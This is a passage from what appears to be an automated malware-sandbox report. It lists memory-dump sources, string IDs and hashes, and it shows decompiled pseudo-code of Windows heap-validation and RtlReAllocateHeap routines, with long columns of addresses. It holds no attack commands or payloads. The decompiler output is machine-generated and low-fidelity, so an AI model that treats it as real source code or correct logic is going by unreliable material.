                                                                                                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00CC53FD
                                                                                                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00CC5496
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                    • API String ID: 0-4009184096
                                                                                                                                                    • Opcode ID: d38e7926752004fbf255b2e8715c158662851609f97f8a508c787486d9732b96
                                                                                                                                                    • Instruction ID: 63416a56df0d4651556d13d1470eb9a6e35d07bf6eb9ec98f6b9fea23c337ecf
                                                                                                                                                    • Opcode Fuzzy Hash: d38e7926752004fbf255b2e8715c158662851609f97f8a508c787486d9732b96
                                                                                                                                                    • Instruction Fuzzy Hash: 36023EF1D406689FDB20DF54CC80BAAB7B8AF55304F4441EAE609A7251E6309FC4DF69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00D1098E, Relevance: 11.7, Strings: 9, Instructions: 401COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                                    			E00D1098E(void* __ecx, unsigned int __edx, signed int _a4, char _a8) {
				signed int _v8;
				signed int _v12;
				signed int* _v16;
				signed int _v20;
				signed int _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t165;
				intOrPtr _t168;
				signed short _t181;
				intOrPtr _t183;
				signed int* _t204;
				signed int _t209;
				signed int _t214;
				signed int* _t216;
				signed int _t226;
				signed int _t228;
				signed int _t233;
				intOrPtr _t235;
				intOrPtr _t246;
				intOrPtr _t257;
				signed int _t280;
				signed int* _t281;
				signed int* _t282;
				signed short _t284;
				signed short _t286;
				signed char _t288;
				intOrPtr* _t298;
				signed int _t309;
				signed int _t310;
				signed int* _t311;
				unsigned int _t312;
				signed int* _t313;
				signed int _t314;
				signed int _t315;
				intOrPtr _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;

				_t308 = __edx;
				_t311 = _a4;
				_v12 = 0;
				_v8 = 0;
				_v16 = _t311;
				if(L00D0FB7A(__ecx, __edx, _t311, 0) == 0) {
					L84:
					E00D106F9(_v16);
					_t337 = _v8;
					if(_v8 != 0) {
						_a4 = _a4 & 0x00000000;
						E00C74167(_t308, _t337, 0xffffffff,  &_v8,  &_a4, 0x8000);
					}
					L48:
					return 0;
				}
				if(_a8 != 0 || (_t311[0x10] & 0x20000000) != 0) {
					_t308 = 0;
					_t165 =  &(_t311[0x31]);
					_t280 =  *_t165;
					_a8 = 0;
					_v24 = 0;
					while(_t165 != _t280) {
						_t280 =  *_t280;
						_a4 =  *_t313 & 0x0000ffff;
						_t288 = _t313[0];
						_v16 = _t313;
						__eflags = _t288 & 0x00000001;
						if((_t288 & 0x00000001) != 0) {
							_t168 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t168 + 0xc);
							if( *(_t168 + 0xc) == 0) {
								_push("HEAP: ");
								E00CB373B();
							} else {
								E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t313);
							E00CB373B("dedicated (%04x) free list element %p is marked busy\n", _a4);
							L22:
							__eflags = _t311[0x13];
							if(_t311[0x13] != 0) {
								_t313[0] = _t313[0] ^ _t313[0] ^  *_t313;
								 *_t313 =  *_t313 ^ _t311[0x14];
							}
							goto L84;
						}
						_t181 =  *_t313 & 0x0000ffff;
						__eflags = _t181 - _v24;
						if(_t181 < _v24) {
							_t183 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t183 + 0xc);
							if( *(_t183 + 0xc) == 0) {
								_push("HEAP: ");
								E00CB373B();
							} else {
								E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							E00CB373B("Non-Dedicated free list element %p is out of order\n", _t313);
							goto L22;
						}
						_t308 = 0;
						_v24 = _t181 & 0x0000ffff;
						__eflags = _t311[0x13];
						if(_t311[0x13] != 0) {
							_t313[0] = _t313[0] ^ _t288 ^  *_t313;
							 *_t313 =  *_t313 ^ _t311[0x14];
							__eflags =  *_t313;
						}
						_t29 =  &_a8;
						 *_t29 = _a8 + 1;
						__eflags =  *_t29;
						_t165 =  &(_t311[0x31]);
					}
					_a4 = 0x208 + (_t311[0x22] & 0x0000ffff) * 4;
					if( *0xd492a4 != 0 && _t311[0x30] != _t308) {
						_push(4);
						_push(0x1000);
						_push( &_a4);
						_push(0);
						_push( &_v8);
						if(E00C5FAD0(0xffffffff) >= 0) {
							_v12 = _v8 + 0x204;
						}
					}
					_t204 =  &(_t311[0x28]);
					_t314 =  *_t204;
					while(_t204 != _t314) {
						__eflags = _t311[0x13];
						_t281 = _t314 + 0x18;
						if(_t311[0x13] != 0) {
							 *_t281 =  *_t281 ^ _t311[0x14];
							__eflags = _t281[0] - (_t281[0] ^ _t281[0] ^  *_t281);
							if(__eflags != 0) {
								_push(0);
								_push(_t281);
								_push(_t311);
								E00D0F8EE(_t281, _t311, _t314, __eflags);
							}
						}
						_t295 = _v12;
						__eflags = _t295;
						if(_t295 == 0) {
							L39:
							__eflags =  *(_t314 + 0x1a) & 0x00000004;
							if(( *(_t314 + 0x1a) & 0x00000004) == 0) {
								L41:
								__eflags = _t311[0x13];
								if(_t311[0x13] != 0) {
									_t281[0] = _t281[0] ^ _t281[0] ^  *_t281;
									 *_t281 =  *_t281 ^ _t311[0x14];
									__eflags =  *_t281;
								}
								_t314 =  *_t314;
								_t204 =  &(_t311[0x28]);
								continue;
							}
							_t209 = E00CF579A(_t295, _t311, _t281);
							__eflags = _t209;
							if(_t209 == 0) {
								__eflags = _t311[0x13];
								if(_t311[0x13] != 0) {
									 *(_t314 + 0x1b) =  *(_t314 + 0x1a) ^  *(_t314 + 0x19) ^  *(_t314 + 0x18);
									_t95 = _t314 + 0x18;
									 *_t95 =  *(_t314 + 0x18) ^ _t311[0x14];
									__eflags =  *_t95;
								}
								goto L48;
							}
							goto L41;
						} else {
							_t214 =  *(_t314 + 0xa) & 0x0000ffff;
							__eflags = _t214;
							if(_t214 == 0) {
								goto L39;
							}
							__eflags = _t214 & 0x00008000;
							if((_t214 & 0x00008000) == 0) {
								__eflags = _t214 & 0x00000800;
								if((_t214 & 0x00000800) != 0) {
									goto L39;
								}
								__eflags = _t214 - _t311[0x22];
								if(_t214 >= _t311[0x22]) {
									goto L39;
								}
								L38:
								_t216 = _t295 + (_t214 & 0x0000ffff) * 4;
								_t295 =  *(_t314 + 0x10) >> 3;
								 *_t216 =  *_t216 + ( *(_t314 + 0x10) >> 3);
								__eflags =  *_t216;
								goto L39;
							}
							_t214 = _t214 & 0x00007fff;
							_t295 = 0x81;
							__eflags = _t214 - 0x81;
							if(_t214 >= 0x81) {
								goto L39;
							}
							_t295 = _v8;
							goto L38;
						}
					}
					_v20 = _v20 & 0x00000000;
					_v24 = _v24 & 0x00000000;
					_t282 =  &(_t311[0x2a]);
					_t315 =  *_t282;
					while(_t315 != _t282) {
						_t226 = L00D0FDDD(_t311, _t315 - 0x10, 0,  &_v20,  &_v24,  &_v16, _v12, _v8);
						__eflags = _t226;
						if(_t226 == 0) {
							goto L84;
						}
						_t315 =  *_t315;
					}
					_t316 = _a8;
					_v16 = _t311;
					if(_t316 == _v20) {
						__eflags = _t311[0x1e] - _v24;
						if(_t311[0x1e] == _v24) {
							_t228 = _v8;
							__eflags = _t228;
							if(_t228 == 0) {
								goto L74;
							}
							_t317 = _t311[0x30];
							__eflags = _t317;
							if(_t317 == 0) {
								L68:
								_t318 = _t311[0x23];
								__eflags = _t318;
								if(__eflags == 0) {
									L73:
									_a4 = 0;
									E00C74167(_t308, __eflags, 0xffffffff,  &_v8,  &_a4, 0x8000);
									goto L74;
								}
								_t233 = _t311[0x22] & 0x0000ffff;
								_t284 = 1;
								_t308 = 1;
								__eflags = 1 - _t233;
								if(__eflags >= 0) {
									goto L73;
								}
								_t312 = _v12;
								while(1) {
									_t309 = _t284 & 0x0000ffff;
									_t308 =  *(_t312 + _t309 * 4);
									_t318 = _t318 + 0x40;
									__eflags =  *(_t312 + _t309 * 4) -  *((intOrPtr*)(_t318 + 8));
									if( *(_t312 + _t309 * 4) !=  *((intOrPtr*)(_t318 + 8))) {
										break;
									}
									_t284 = _t284 + 1;
									__eflags = _t284 - _t233;
									if(__eflags < 0) {
										continue;
									}
									goto L73;
								}
								_t235 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t235 + 0xc);
								if( *(_t235 + 0xc) == 0) {
									_push("HEAP: ");
									E00CB373B();
								} else {
									E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_t298 = _t312 + (_t284 & 0x0000ffff) * 4;
								_push(_t298);
								_push( *_t298);
								_t319 = _t318 + 0x10;
								__eflags = _t319;
								_push( *((intOrPtr*)(_t319 - 8)));
								_push(_t319);
								E00CB373B("Tag %04x (%ws) size incorrect (%x != %x) %p\n", _t284 & 0x0000ffff);
								goto L84;
							}
							_t286 = 1;
							__eflags = 1;
							while(1) {
								_t310 = _t286 & 0x0000ffff;
								_t308 =  *(_t228 + _t310 * 4);
								_t317 = _t317 + 0xc;
								__eflags =  *(_t228 + _t310 * 4) -  *((intOrPtr*)(_t317 + 8));
								if( *(_t228 + _t310 * 4) !=  *((intOrPtr*)(_t317 + 8))) {
									break;
								}
								_t286 = _t286 + 1;
								_t308 = 0x81;
								__eflags = _t286 - 0x81;
								if(_t286 < 0x81) {
									continue;
								}
								goto L68;
							}
							_t246 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t246 + 0xc);
							if( *(_t246 + 0xc) == 0) {
								_push("HEAP: ");
								E00CB373B();
							} else {
								E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							_push( *((intOrPtr*)(_v8 + (_t286 & 0x0000ffff) * 4)));
							_push( *((intOrPtr*)(_t317 + 8)));
							E00CB373B("Pseudo Tag %04x size incorrect (%x != %x) %p\n", _t286 & 0x0000ffff);
							goto L84;
						}
						_t257 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t257 + 0xc);
						if( *(_t257 + 0xc) == 0) {
							_push("HEAP: ");
							E00CB373B();
						} else {
							E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_t311[0x1e]);
						_push(_v24);
						_push("Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)\n");
						L57:
						E00CB373B();
						goto L84;
					}
					if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) == 0) {
						_push("HEAP: ");
						E00CB373B();
					} else {
						E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t316);
					_push(_v20);
					_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
					goto L57;
				} else {
					L74:
					return 1;
				}
			}












































                                                                                                                                                    0x00d1098e
                                                                                                                                                    0x00d10999
                                                                                                                                                    0x00d109a0
                                                                                                                                                    0x00d109a3
                                                                                                                                                    0x00d109a6
                                                                                                                                                    0x00d109b0
                                                                                                                                                    0x00d10e2c
                                                                                                                                                    0x00d10e2f
                                                                                                                                                    0x00d10e34
                                                                                                                                                    0x00d10e38
                                                                                                                                                    0x00d10e3e
                                                                                                                                                    0x00d10e51
                                                                                                                                                    0x00d10e51
                                                                                                                                                    0x00d10c22
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10c22
                                                                                                                                                    0x00d109ba
                                                                                                                                                    0x00d109c9
                                                                                                                                                    0x00d109cb
                                                                                                                                                    0x00d109d1
                                                                                                                                                    0x00d109d3
                                                                                                                                                    0x00d109d6
                                                                                                                                                    0x00d10a47
                                                                                                                                                    0x00d10a01
                                                                                                                                                    0x00d10a03
                                                                                                                                                    0x00d10a06
                                                                                                                                                    0x00d10a09
                                                                                                                                                    0x00d10a0c
                                                                                                                                                    0x00d10a0f
                                                                                                                                                    0x00d10aa7
                                                                                                                                                    0x00d10aaa
                                                                                                                                                    0x00d10aae
                                                                                                                                                    0x00d10ad0
                                                                                                                                                    0x00d10ad5
                                                                                                                                                    0x00d10ab0
                                                                                                                                                    0x00d10ac8
                                                                                                                                                    0x00d10acd
                                                                                                                                                    0x00d10adb
                                                                                                                                                    0x00d10ae4
                                                                                                                                                    0x00d10aec
                                                                                                                                                    0x00d10aec
                                                                                                                                                    0x00d10af0
                                                                                                                                                    0x00d10afe
                                                                                                                                                    0x00d10b04
                                                                                                                                                    0x00d10b04
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10af0
                                                                                                                                                    0x00d10a15
                                                                                                                                                    0x00d10a18
                                                                                                                                                    0x00d10a1c
                                                                                                                                                    0x00d10b11
                                                                                                                                                    0x00d10b14
                                                                                                                                                    0x00d10b18
                                                                                                                                                    0x00d10b3a
                                                                                                                                                    0x00d10b3f
                                                                                                                                                    0x00d10b1a
                                                                                                                                                    0x00d10b32
                                                                                                                                                    0x00d10b37
                                                                                                                                                    0x00d10b4b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10b51
                                                                                                                                                    0x00d10a25
                                                                                                                                                    0x00d10a27
                                                                                                                                                    0x00d10a2a
                                                                                                                                                    0x00d10a2d
                                                                                                                                                    0x00d10a36
                                                                                                                                                    0x00d10a3c
                                                                                                                                                    0x00d10a3c
                                                                                                                                                    0x00d10a3c
                                                                                                                                                    0x00d10a3e
                                                                                                                                                    0x00d10a3e
                                                                                                                                                    0x00d10a3e
                                                                                                                                                    0x00d10a41
                                                                                                                                                    0x00d10a41
                                                                                                                                                    0x00d10a60
                                                                                                                                                    0x00d10a63
                                                                                                                                                    0x00d10a6d
                                                                                                                                                    0x00d10a6f
                                                                                                                                                    0x00d10a77
                                                                                                                                                    0x00d10a78
                                                                                                                                                    0x00d10a7d
                                                                                                                                                    0x00d10a87
                                                                                                                                                    0x00d10a91
                                                                                                                                                    0x00d10a91
                                                                                                                                                    0x00d10a87
                                                                                                                                                    0x00d10a94
                                                                                                                                                    0x00d10a9a
                                                                                                                                                    0x00d10bf0
                                                                                                                                                    0x00d10b54
                                                                                                                                                    0x00d10b58
                                                                                                                                                    0x00d10b5b
                                                                                                                                                    0x00d10b60
                                                                                                                                                    0x00d10b6a
                                                                                                                                                    0x00d10b6d
                                                                                                                                                    0x00d10b6f
                                                                                                                                                    0x00d10b71
                                                                                                                                                    0x00d10b72
                                                                                                                                                    0x00d10b73
                                                                                                                                                    0x00d10b73
                                                                                                                                                    0x00d10b6d
                                                                                                                                                    0x00d10b78
                                                                                                                                                    0x00d10b7b
                                                                                                                                                    0x00d10b7d
                                                                                                                                                    0x00d10bc1
                                                                                                                                                    0x00d10bc1
                                                                                                                                                    0x00d10bc5
                                                                                                                                                    0x00d10bd2
                                                                                                                                                    0x00d10bd2
                                                                                                                                                    0x00d10bd6
                                                                                                                                                    0x00d10be0
                                                                                                                                                    0x00d10be6
                                                                                                                                                    0x00d10be6
                                                                                                                                                    0x00d10be6
                                                                                                                                                    0x00d10be8
                                                                                                                                                    0x00d10bea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10bea
                                                                                                                                                    0x00d10bc9
                                                                                                                                                    0x00d10bce
                                                                                                                                                    0x00d10bd0
                                                                                                                                                    0x00d10c0a
                                                                                                                                                    0x00d10c0e
                                                                                                                                                    0x00d10c19
                                                                                                                                                    0x00d10c1f
                                                                                                                                                    0x00d10c1f
                                                                                                                                                    0x00d10c1f
                                                                                                                                                    0x00d10c1f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10c0e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10b7f
                                                                                                                                                    0x00d10b7f
                                                                                                                                                    0x00d10b83
                                                                                                                                                    0x00d10b86
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10b88
                                                                                                                                                    0x00d10b8d
                                                                                                                                                    0x00d10ba3
                                                                                                                                                    0x00d10ba8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10baa
                                                                                                                                                    0x00d10bb1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10bb3
                                                                                                                                                    0x00d10bb6
                                                                                                                                                    0x00d10bbc
                                                                                                                                                    0x00d10bbf
                                                                                                                                                    0x00d10bbf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10bbf
                                                                                                                                                    0x00d10b8f
                                                                                                                                                    0x00d10b94
                                                                                                                                                    0x00d10b99
                                                                                                                                                    0x00d10b9c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10b9e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10b9e
                                                                                                                                                    0x00d10b7d
                                                                                                                                                    0x00d10bf8
                                                                                                                                                    0x00d10bfc
                                                                                                                                                    0x00d10c00
                                                                                                                                                    0x00d10c06
                                                                                                                                                    0x00d10c51
                                                                                                                                                    0x00d10c42
                                                                                                                                                    0x00d10c47
                                                                                                                                                    0x00d10c49
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10c4f
                                                                                                                                                    0x00d10c4f
                                                                                                                                                    0x00d10c55
                                                                                                                                                    0x00d10c58
                                                                                                                                                    0x00d10c5e
                                                                                                                                                    0x00d10cb3
                                                                                                                                                    0x00d10cb6
                                                                                                                                                    0x00d10cff
                                                                                                                                                    0x00d10d04
                                                                                                                                                    0x00d10d06
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10d08
                                                                                                                                                    0x00d10d0e
                                                                                                                                                    0x00d10d10
                                                                                                                                                    0x00d10d2e
                                                                                                                                                    0x00d10d2e
                                                                                                                                                    0x00d10d34
                                                                                                                                                    0x00d10d36
                                                                                                                                                    0x00d10d60
                                                                                                                                                    0x00d10d6f
                                                                                                                                                    0x00d10d72
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10d72
                                                                                                                                                    0x00d10d38
                                                                                                                                                    0x00d10d41
                                                                                                                                                    0x00d10d42
                                                                                                                                                    0x00d10d44
                                                                                                                                                    0x00d10d47
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10d49
                                                                                                                                                    0x00d10d4c
                                                                                                                                                    0x00d10d4c
                                                                                                                                                    0x00d10d4f
                                                                                                                                                    0x00d10d52
                                                                                                                                                    0x00d10d55
                                                                                                                                                    0x00d10d58
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10d5a
                                                                                                                                                    0x00d10d5b
                                                                                                                                                    0x00d10d5e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10d5e
                                                                                                                                                    0x00d10ddb
                                                                                                                                                    0x00d10dde
                                                                                                                                                    0x00d10de1
                                                                                                                                                    0x00d10e03
                                                                                                                                                    0x00d10e08
                                                                                                                                                    0x00d10de3
                                                                                                                                                    0x00d10dfb
                                                                                                                                                    0x00d10e00
                                                                                                                                                    0x00d10e11
                                                                                                                                                    0x00d10e14
                                                                                                                                                    0x00d10e15
                                                                                                                                                    0x00d10e17
                                                                                                                                                    0x00d10e17
                                                                                                                                                    0x00d10e1a
                                                                                                                                                    0x00d10e1d
                                                                                                                                                    0x00d10e24
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10e29
                                                                                                                                                    0x00d10d14
                                                                                                                                                    0x00d10d14
                                                                                                                                                    0x00d10d15
                                                                                                                                                    0x00d10d15
                                                                                                                                                    0x00d10d18
                                                                                                                                                    0x00d10d1b
                                                                                                                                                    0x00d10d1e
                                                                                                                                                    0x00d10d21
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10d23
                                                                                                                                                    0x00d10d24
                                                                                                                                                    0x00d10d29
                                                                                                                                                    0x00d10d2c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10d2c
                                                                                                                                                    0x00d10d86
                                                                                                                                                    0x00d10d89
                                                                                                                                                    0x00d10d8c
                                                                                                                                                    0x00d10dae
                                                                                                                                                    0x00d10db3
                                                                                                                                                    0x00d10d8e
                                                                                                                                                    0x00d10da6
                                                                                                                                                    0x00d10dab
                                                                                                                                                    0x00d10dbf
                                                                                                                                                    0x00d10dc2
                                                                                                                                                    0x00d10dcb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10dd0
                                                                                                                                                    0x00d10cbe
                                                                                                                                                    0x00d10cc1
                                                                                                                                                    0x00d10cc5
                                                                                                                                                    0x00d10ce7
                                                                                                                                                    0x00d10cec
                                                                                                                                                    0x00d10cc7
                                                                                                                                                    0x00d10cdf
                                                                                                                                                    0x00d10ce4
                                                                                                                                                    0x00d10cf2
                                                                                                                                                    0x00d10cf5
                                                                                                                                                    0x00d10cf8
                                                                                                                                                    0x00d10ca3
                                                                                                                                                    0x00d10ca3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10ca8
                                                                                                                                                    0x00d10c6d
                                                                                                                                                    0x00d10c8f
                                                                                                                                                    0x00d10c94
                                                                                                                                                    0x00d10c6f
                                                                                                                                                    0x00d10c87
                                                                                                                                                    0x00d10c8c
                                                                                                                                                    0x00d10c9a
                                                                                                                                                    0x00d10c9b
                                                                                                                                                    0x00d10c9e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10d77
                                                                                                                                                    0x00d10d77
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10d77

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%x != %x) %p$RtlFreeHeap$Tag %04x (%ws) size incorrect (%x != %x) %p$Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)$dedicated (%04x) free list element %p is marked busy
                                                                                                                                                    • API String ID: 0-3316276410
                                                                                                                                                    • Opcode ID: cf6af2fff3a861beda7429727ab83992229a42769b109220a573ffc7baa88a34
                                                                                                                                                    • Instruction ID: 66173cc3075399dcbf9314ab17d4436ff42dd29c771c3e51093b5148a9461982
                                                                                                                                                    • Opcode Fuzzy Hash: cf6af2fff3a861beda7429727ab83992229a42769b109220a573ffc7baa88a34
                                                                                                                                                    • Instruction Fuzzy Hash: 86F1CF71600245BFCB20EF68D480BE6BBF5FF05714F588155E8859B682CBB0E9C5DBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00D11238, Relevance: 10.3, Strings: 8, Instructions: 324COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 65%
                                                                                                                                                    			E00D11238(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t123;
				signed int _t124;
				void* _t130;
				intOrPtr _t132;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				intOrPtr _t151;
				intOrPtr _t163;
				signed int _t173;
				signed int _t174;
				signed int _t178;
				short _t184;
				signed int _t193;
				signed int _t194;
				intOrPtr _t197;
				intOrPtr _t219;
				short* _t233;
				void* _t246;
				intOrPtr _t248;
				signed int _t251;
				signed int _t253;
				signed int _t254;
				void* _t255;
				void* _t256;

				_t246 = __edx;
				_push(0x18);
				_push(0xc6d158);
				_t123 = L00C6DF5C(__ebx, __edi, __esi);
				_t248 =  *((intOrPtr*)(_t255 + 8));
				 *((intOrPtr*)(_t255 + 8)) = _t248;
				 *((char*)(_t255 - 0x19)) = 0;
				 *(_t255 - 0x24) = 0;
				if(( *(_t248 + 0x44) & 0x01000000) == 0) {
					 *(_t255 - 4) = 0;
					 *(_t255 - 4) = 1;
					_t232 = "RtlReAllocateHeap";
					_t124 = E00C785CA(_t248, "RtlReAllocateHeap");
					__eflags = _t124;
					if(_t124 != 0) {
						 *(_t255 + 0xc) =  *(_t255 + 0xc) |  *(_t248 + 0x44) | 0x10000100;
						_t251 =  *(_t255 + 0x14);
						__eflags = _t251;
						if(_t251 == 0) {
							_t235 = 1;
							__eflags = 1;
						} else {
							_t235 = _t251;
						}
						_t130 = ( *((intOrPtr*)(_t248 + 0x98)) + _t235 &  *(_t248 + 0x9c)) + 8;
						__eflags = _t130 - _t251;
						if(_t130 < _t251) {
							L66:
							_t132 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t132 + 0xc);
							if( *(_t132 + 0xc) == 0) {
								_push("HEAP: ");
								E00CB373B();
							} else {
								E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							_push( *((intOrPtr*)(_t248 + 0x7c)));
							E00CB373B("Invalid allocation size - %x (exceeded %x)\n", _t251);
							E00D106F9(0);
							_t117 = _t255 - 0x24;
							 *_t117 =  *(_t255 - 0x24) & 0x00000000;
							__eflags =  *_t117;
							goto L71;
						} else {
							__eflags = _t130 -  *((intOrPtr*)(_t248 + 0x7c));
							if(_t130 >  *((intOrPtr*)(_t248 + 0x7c))) {
								goto L66;
							}
							__eflags =  *(_t255 + 0xc) & 0x00000001;
							if(__eflags == 0) {
								E00C622D0(__eflags,  *((intOrPtr*)(_t248 + 0xcc)));
								 *((char*)(_t255 - 0x19)) = 1;
								_t26 = _t255 + 0xc;
								 *_t26 =  *(_t255 + 0xc) | 0x00000001;
								__eflags =  *_t26;
							}
							E00D1098E(_t235, _t246, _t248, 0);
							_t253 =  *((intOrPtr*)(_t255 + 0x10)) + 0xfffffff8;
							__eflags =  *((char*)(_t253 + 7)) - 5;
							if( *((char*)(_t253 + 7)) == 5) {
								_t253 = _t253 - (( *(_t253 + 6) & 0x000000ff) << 3);
								__eflags = _t253;
							}
							_t145 = L00CA0ED7(_t235, _t248, _t253, _t232);
							__eflags = _t145;
							if(_t145 == 0) {
								L52:
								_t146 =  *(_t255 - 0x24);
								__eflags = _t146;
								if(_t146 == 0) {
									L71:
									_t119 = _t255 - 4;
									 *_t119 =  *(_t255 - 4) & 0x00000000;
									__eflags =  *_t119;
									 *(_t255 - 4) = 0xfffffffe;
